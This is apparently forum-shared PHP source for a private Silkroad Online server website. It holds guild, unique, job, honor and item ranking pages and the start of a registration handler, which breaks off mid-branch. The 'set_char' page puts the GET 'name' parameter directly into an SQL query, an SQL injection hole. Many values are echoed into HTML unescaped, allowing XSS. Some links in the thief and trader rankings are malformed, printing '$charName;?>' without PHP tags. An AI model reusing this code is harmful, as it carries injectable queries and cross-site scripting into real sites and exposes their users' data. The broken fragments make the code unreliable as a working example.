</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('shard');
        if(!isset($_GET['name']))
        {
        
            $hQuery = core::$sql -> exec("select top 50 * from _Guild where ID > 0 and ID != 24 order by Lvl desc,GatheredSP desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align='center' class='thead'><b>#</b></td>
        <td align='center' class='thead'><b>Name</b></td>
        <td align='center' class='thead'><b>Level</b></td>
        <td align='center' class='thead'><b>Members</b></td>
        <td align='center' class='thead'><b>Points</b></td>
    </tr>
            <?php $nGuild = 1;
            while($row = mssql_fetch_array($hQuery))
            {
                $nMembers = core::$sql -> getRow("select count(*) from _GuildMember where GuildID='$row[ID]'");?>
    <tr>
        <td align='center'><b><?php echo $nGuild;?></b></td>
        <td align='center'><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
        <td align='center'><?php echo $row[Lvl];?></td>
        <td align='center'><?php echo $nMembers;?></td>
        <td align='center'><?php echo $row[GatheredSP];?></td>
    </tr>
                <?php $nGuild++;
            }?>
</table>
<?php echo misc::back(); 
            #misc::back();
        }
        else
        {
            if(security::isSecureString($_GET['name'], 3))
            {
                if(core::$sql -> numRows("select * from _Guild where Name='$_GET[name]'") == 0)
                {
                    echo "Guild with such name not found.";
                }
                else
                {
                    $hGuildData = mssql_fetch_array(mssql_query("select * from _Guild where Name='$_GET[name]'"));
                    $hGuildMembers = core::$sql -> exec("select * from _GuildMember where GuildID='$hGuildData[ID]' order by MemberClass asc,Contribution DESC,GuildWarKill DESC,CharLevel DESC,GP_Donation DESC");
            
                    /*
                    for guild Gold add those lines :
                    
                    <td align='center'>Gold</td>
                    <td align='center'>$hGuildData[Gold]</td>
                    
                    */?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td align='center'><b>Name</b></td>
        <td align='center'><b class="color-green"><?php echo $hGuildData[Name];?></b></td>
    </tr>
    <tr>
        <td align='center'><b>Level</b></td>
        <td align='center'><?php echo $hGuildData[Lvl];?></td>
    </tr>
    <tr>
        <td align='center'><b>Points</b></td>
        <td align='center'><?php echo $hGuildData[GatheredSP];?></td>
    </tr>
    <tr>
        <td align='center'><b>Foundation</b></td>
        <td align='center'><?php echo $hGuildData[FoundationDate];?></td>
    </tr>
</table>

<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width='5%' align='center' class='thead'><b>#</td>
        <td width='5%' align='center' class='thead'><b>Race</b></td>
        <td width='15%' align='center' class='thead'><b>Charname</b></td>
        <td width='15%' align='center' class='thead'><b>Nick</b></td>
        <td width='10%' align='center' class='thead'><b>Level</b></td>
        <td width='15%' align='center' class='thead'><b>Donation</b></td>
        <td width='15%' align='center' class='thead'><b>Guild War Kills</b></td>
        <td width='15%' align='center' class='thead'><b>Guild War Killed</b></td>
        <td width='15%' align='center' class='thead'><b>Type</b></td>
    </tr>
                            <?php $n = 1;
                        while($row = mssql_fetch_array($hGuildMembers))
                        {
                            $cName = char::charnameByCharID($row['CharID']);
                            $szNickname = "";
                            
                            $nRefObjID = core::$sql -> getRow("select RefObjID from _Char where CharName16='$cName'");
                            $icon = "";
                            if($nRefObjID < 3000) $icon = "<img src='img/Character/race_china.png'>";
                            else $icon="<img src='img/Character/race_euro.png'>";
                            
                            $memberType = "";
                            if($row['MemberClass'] == 0) $memberType = "<font class='color-red'>Master</font>";
                            else
                            $memberType = "Member";
                            
                            if(empty($row['Nickname'])) $szNickname = "<font color='blue'>NONE</font>";
                            else $szNickname = $row['Nickname'];?>
    <tr>
        <td align='center'><?php echo $n;?></td>
        <td align='center'><?php echo $icon;?></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $cName;?>'><b class="color-green"><?php echo $cName;?></a></td>
        <td align='center'><?php echo $szNickname;?></td>
        <td align='center'><?php echo $row[CharLevel];?></td>
        <td align='center'><?php echo $row[GP_Donation];?></td>
        <td align='center'><?php echo $row[GuildWarKill];?></td>
        <td align='center'><?php echo $row[GuildWarKilled];?></td>
        <td align='center'><?php echo $memberType;?></td>
    </tr>
                        <? $n++;
                         }
echo "</table>";
                        misc::back();    
                }
            }    else echo "Invalid guild name.";
        }?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php 
    }
    break;
    
    //Unique Kills Ranking
    
    case('unique'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Unique Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Unique Ranking</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('acc');
        $n = 1;
        $hQuery = core::$sql -> exec("select top 100 * from Evangelion_uniques order by time desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>#</td>
        <td>Charname</td>
        <td>Unique</td>
        <td>Time</td>
</tr>
        <?php while($row = mssql_fetch_array($hQuery))
        {
                $UniqueType = $row['MobName'];
                switch($UniqueType) {
                // Tiger Girl
                case "MOB_CH_TIGERWOMAN":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Tiger Girl</td><td>'.$row['time'].'</td></tr>';
                break;
                //Cerberus
                case "MOB_EU_KERBEROS":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Cerberus</td><td>'.$row['time'].'</td></tr>';
                break;
                //Captain Ivy
                case "MOB_AM_IVY":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Captain Ivy</td><td>'.$row['time'].'</td></tr>';
                break;
                //Uruchi
                case "MOB_OA_URUCHI":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Uruchi</td><td>'.$row['time'].'</td></tr>';
                break;
                //Isyutaru
                case "MOB_KK_ISYUTARU":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Isyutaru</td><td>'.$row['time'].'</td></tr>';
                break;
                //Lord Yarkan
                case "MOB_TK_BONELORD":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Lord Yarkan</td><td>'.$row['time'].'</td></tr>';
                break;
                //Demon Shaitan
                case "MOB_RM_TAHOMET":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>Demon Shaitan</td><td>'.$row['time'].'</td></tr>';
                break;
                //Medusa
                case "MOB_TQ_BLACKSNAKE":
                echo '<tr><td>'.$n.'</td><td><a href="?pg=rank&type=char&name='.$row['CharName'].'"><b class="color-green">'.$row['CharName'].'</b></a></td><td>SoSo The Black Viper    </td><td>'.$row['time'].'</td></tr>';
                break;
                //Anything Else will be posted has pk2 name (must be added to those lines if you wanna add a real name.
                default:
                break;
                }
            $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
<?php 
    }
    break;
    
    // Job Ranking
    
    case('job'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Rankings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Rankings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
    }
    
    //Job Ranking - Thiefs Only    

    case('jobthief'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 2 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Thief</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Thief</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'>$charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
        
    }
    
    //Job Ranking - Hunters Only
    
    case('jobhunter'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 3 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Hunter</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Hunter</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader' ><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $charName;?>'><?php echo $charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
            <?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
    }
    
    //Job Ranking - Trader Only
    
    case('jobtrader'):
    {
        core::$sql -> changeDB("shard");
        $hQuery = core::$sql -> exec("select top 50 * from _CharTrijob where JobType = 1 order by Contribution desc, Exp desc, Level desc");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Job Trader</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Job Trader</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">     
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><a href='?pg=rank&type=jobtrader'><img src='img/trader-icon.png' alt='Trader'/> Trader</a></td>
        <td align='center'><a href='?pg=rank&type=jobthief'><img src='img/thief-icon.png' alt='Thief'/>  Thief</a></td>
        <td align='center'><a href='?pg=rank&type=jobhunter'><img src='img/hunter-icon.png' alt='Hunter'/> Hunter</a></td>
        <td align='center'><a href='?pg=rank&type=job'><img src='img/trader-icon.png' alt='Trader'/><img src='img/hunter-icon.png' alt='Hunter'/><img src='img/thief-icon.png' alt='Thief'/> All</a></td>
    </tr>
</table>

<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Char name</b></td>
        <td align='center'><b>Job type</b></td>
        <td align='center'><b>Exp</b></td>
        <td align='center'><b>Contribution</b></td>
    </tr>
        <?php $n = 1;
        while($row = mssql_fetch_array($hQuery))
        {
            $jobType = char::jobTypeByID($row['JobType']);
            $charName = char::charnameByCharID($row['CharID']);?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=$charName;?>'>$charName;?></a></td>
        <td align='center'><?php echo $jobType;?></td>
        <td align='center'><?php echo $row[Exp];?></td>
        <td align='center'><?php echo $row[Contribution];?></td>
    </tr>
<?php $n++;
        }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php break;        
        
    }
    
    //Honor Ranking
    
    case('honor'):
    {
        core::$sql -> changeDB("shard");
        
        $hHonorRank = core::$sql -> exec("select * from _TrainingCampHonorRank where CampID IS NOT NULL order by Ranking ASC");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Honor Rankings</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Honor Rankings</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table class='table table-striped' border='0' cellpadding='0' cellspacing='0'>
    <tr>
        <td align='center'><b>#</b></td>
        <td align='center'><b>Owner</b></td>
        <td align='center'><b>Graduates</b></td>
    </tr>
<?php 
        while($row = mssql_fetch_array($hHonorRank))
        {
            $data = misc::getCampDataByID($row['CampID']);?>
    <tr>
        <td align='center'><b><?php echo $row[Ranking];?></b></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $data[OwnerName];?>'><?php echo $data[OwnerName];?></a></td>
        <td align='center'><?php echo $data[GraduateCount];?></td>
    </tr>
        <?php }?>    
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }
    break;
    
    //We'll be added in future updates.
    
    case('set_plus'):
        core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Items</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Items</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><b>Char Name</b></td>
        <td><b>Image</b></td>
        <td><b>Item Name</b></td>
        <td><b>Type</b></td>
        <td><b>Level</b></td>
        <td><b>Plus Value</b></td>
    </tr>
        <?php $query = core::$sql -> exec("
            select top 50 it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128, obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
            from _Items as it
            LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
            LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
            LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
            LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
            LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
            LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
            where ch.CharName16 is not NULL and CodeName128 not like '%stone%' and CharName16 not like '%]%'
            ORDER BY it.OptLevel DESC, obj.ReqLevel1 DESC, item.ItemClass DESC, adv.nOptValue DESC
        ");
            
        while ($row = mssql_fetch_array($query)){?>        
    <tr>
        <td align="center"><a href="?pg=rank&type=char&name=<?php echo $row['CharName16'];?>"><?php echo $row['CharName16'];?></a></td>
        <td align="center"><img src="./<?php echo $row['AssocFileIcon128'];?>.png" width="32" height="32"  alt=""/></td>
        <td><?php echo $row['EndTextString'];?></td>
        <?php $totalvalue = $row['OptLevel']+$row['nOptValue'];
        $advonly = $row['nOptValue'];
        $itemclass = $row['ItemClass'];
        switch($itemclass) {
        case 1:
        echo '<td>Normal</td>';
        break;
        case 2:
        echo '<td>Seal Of Moon</td>';
        break;
        case 3:
        echo '<td>Seal Of Sun</td>';
        break;
        case 4:
        echo '<td>Normal</td>';
        break;
        case 5:
        echo '<td>Seal Of Moon</td>';
        break;
        case 6:
        echo '<td>Seal Of Sun</td>';
        break;
        case 7:
        echo '<td>Normal</td>';
        break;
        case 8:
        echo '<td>Seal Of Star</td>';
        break;
        case 9:
        echo '<td>Seal Of Moon</td>';
        break;
        case 10:
        echo '<td>Seal Of Sun</td>';
        break;
        case 11:
        echo '<td>Normal</td>';
        break;
        case 12:
        echo '<td>Seal Of Star</td>';
        break;
        case 13:
        echo '<td>Seal Of Moon</td>';
        break;
        case 14:
        echo '<td>Seal Of Sun</td>';
        break;
        case 15:
        echo '<td>Normal</td>';
        break;
        case 16:
        echo '<td>Seal Of Star</td>';
        break;
        case 17:
        echo '<td>Seal Of Moon</td>';
        break;
        case 18:
        echo '<td>Seal Of Sun</td>';
        break;
        case 19:
        echo '<td>Normal</td>';
        break;
        case 20:
        echo '<td>Seal Of Star</td>';
        break;
        case 21:
        echo '<td>Seal Of Moon</td>';
        break;
        case 22:
        echo '<td>Seal Of Sun</td>';
        break;
        case 23:
        echo '<td>Normal</td>';
        break;
        case 24:
        echo '<td>Seal Of Star</td>';
        break;
        case 25:
        echo '<td>Seal Of Moon</td>';
        break;
        case 26:
        echo '<td>Seal Of Sun</td>';
        break;
        case 27:
        echo '<td>Normal</td>';
        break;
        case 28:
        echo '<td>Seal Of Star</td>';
        break;
        case 29:
        echo '<td>Seal Of Moon</td>';
        break;
        case 30:
        echo '<td>Seal Of Sun</td>';
        break;
        default:
        echo '<td>Normal</td>';
        break;
        }
        echo '<td align="center">'.$row['ReqLevel1'].'</td>';
        echo '<td>'.$totalvalue.'';
        switch($advonly) {
        case "NULL":
        break;
        case 1:
        echo '+(1) ADV</td>';
        break;
        case 2:
        echo '+(2) ADV</td>';
        break;
        }
        echo '</tr>';
        }?>
    </tr>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
    <?php break;
    
    
    
    case('set_char'):
$nCharName = $_GET['name'];
core::$sql -> changeDB("shard");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Items</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Items</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><b>Char Name</b></td>
        <td><b>Image</b></td>
        <td><b>Item Name</b></td>
        <td><b>Type</b></td>
        <td><b>Level</b></td>
        <td><b>Plus Value</b></td>
    </tr>
<?php $query = core::$sql -> exec("
select it.OptLevel, ch.CharName16, obj.AssocFileIcon128, obj.Country, obj.CodeName128 ,obj.ReqLevel1 , item.ItemClass , adv.nOptValue ,es.EndTextString
from _Items as it
LEFT JOIN [dbo].[_Inventory] as inv ON it.ID64 = inv.ItemID
LEFT JOIN [dbo].[_Char] as ch ON inv.CharID = ch.CharID
LEFT JOIN [dbo].[_RefObjCommon] as obj ON it.RefItemID = obj.ID
LEFT JOIN [dbo].[_RefObjItem] as item ON obj.Link = item.ID
LEFT JOIN [dbo].[_BindingOptionWithItem] as adv ON it.ID64 = adv.nItemDBID
LEFT JOIN [dbo].[C_EquipStrings] as es on obj.NameStrID128 = es.TextString
where ch.CharName16 = '$nCharName' and inv.Slot between 0 and 12 and inv.Slot != 8
");
while ($row = mssql_fetch_array($query)){
echo '<tr>';
echo '<td align="center"><a href="?pg=rank&type=char&name='.$row['CharName16'].'">'.$row['CharName16'].'</a></td>';
if($row['AssocFileIcon128'] == 'xxx'){
echo '<td><img src="./item/clean.png" width="32" height="32"  alt=""/></td>';
} else {
echo '<td><img src="./'.$row['AssocFileIcon128'].'.png" width="32" height="32"  alt=""/></td>';
}
if($row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['EndTextString'].'</td>';        
}
$totalvalue = $row['OptLevel']+$row['nOptValue'];
$advonly = $row['nOptValue'];
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
$itemclass = $row['ItemClass'];
switch($itemclass) {
case 27:
echo '<td>Normal</td>';
break;
case 28:
echo '<td>Seal Of Star</td>';
break;
case 29:
echo '<td>Seal Of Moon</td>';
break;
case 30:
echo '<td>Seal Of Sun</td>';
break;
default:
echo '<td>Normal</td>';
break;
}}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$row['ReqLevel1'].'</td>';
}
if($row['CodeName128'] == 'ITEM_ETC_AMMO_ARROW_01' || $row['CodeName128'] == 'ITEM_ETC_AMMO_BOLT_01' || $row['CodeName128'] == 'DUMMY_OBJECT'){
echo '<td>-</td>';
} else {
echo '<td>'.$totalvalue.'';
switch($advonly) {
case "NULL":
break;
case 1:
echo '+(1) ADV</td>';
break;
case 2:
echo '+(2) ADV</td>';
break;
}}
echo '</tr>';
}?>    
</table>
<?php echo misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->

    <?php break;
    
    // Default Page (Without Page Selected) .
    
    default:
    {
        //list functions
        
        break;
    }
}

?>

reg

كود PHP:

<?php
global $core;
    if(isset($_GET['ref']))
    {
        if(security::isSecureString($_GET['ref'], 3) && $core -> aConfig['allowRefferals'] == 1)
        {
            $_SESSION['ref'] = $_GET['ref'];
        }
    }
    
    if(isset($_POST['submit']) && $_POST['submit'] != 'login')
    {
        $errors = array();
        if(strlen($_POST['username']) > 16) $errors[] = "Username too long";
        if(strlen($_POST['username']) < 3)    $errors[] = "Username too short";
        if(strlen($_POST['pass1']) > 32)    $errors[] = "Password [1] too long";
        if(strlen($_POST['pass1']) < 6)     $errors[] = "Password [1] too short";
        if(strlen($_POST['pass2']) > 32)    $errors[] = "Password [2] too long";
        if(strlen($_POST['pass2']) < 6)        $errors[] = "Password [2] too short";
        if(strlen($_POST['email']) > 54)    $errors[] = "Email too long";
        if(strlen($_POST['email']) < 6)    $errors[] = "Email too short";
        /******** Answers Sec *********/
        if(strlen($_POST['sec_question']) > 54)    $errors[] = "Security Question too long";
        if(strlen($_POST['sec_question']) < 3)    $errors[] = "Security Question too short";
        if(strlen($_POST['sec_answer']) > 54)    $errors[] = "Security Answer too long";
        if(strlen($_POST['sec_answer']) < 3)    $errors[] = "Security Answer too short";
        
        if(!security::isSecureString($_POST['username'], 3))         $errors[] = "Username field contains forbidden symbols";
        if(!security::isSecureString($_POST['pass1'], 3))             $errors[] = "Password [1] field contains forbidden symbols";
        if(!security::isSecureString($_POST['pass2'] ,3))             $errors[] = "Password [2] field contains forbidden symbols";
        if(!security::isSecureString($_POST['email'], 2))             $errors[] = "Email field contains forbidden symbols";
        if(!security::isCorrectEmail($_POST['email']))                 $errors[] = "Invalid email address";
        if($_POST['pass1'] != $_POST['pass2'])                          $errors[] = "Password fields dosent match";
        
        
        if(count($errors) > 0)
        {?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
            
                <?php for($i = 0; $i < count($errors); $i++)
                {?>
                <p><?php echo $errors[$i].".<br/>";?></p>            
                <?php }?>
            </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->

        <?php }
        else
        {
            
            if(user::accountExists($_POST['username']) == 1)
            {?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
                <p>This username is already taken.</p>
            </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
            <?php }
            else
            {
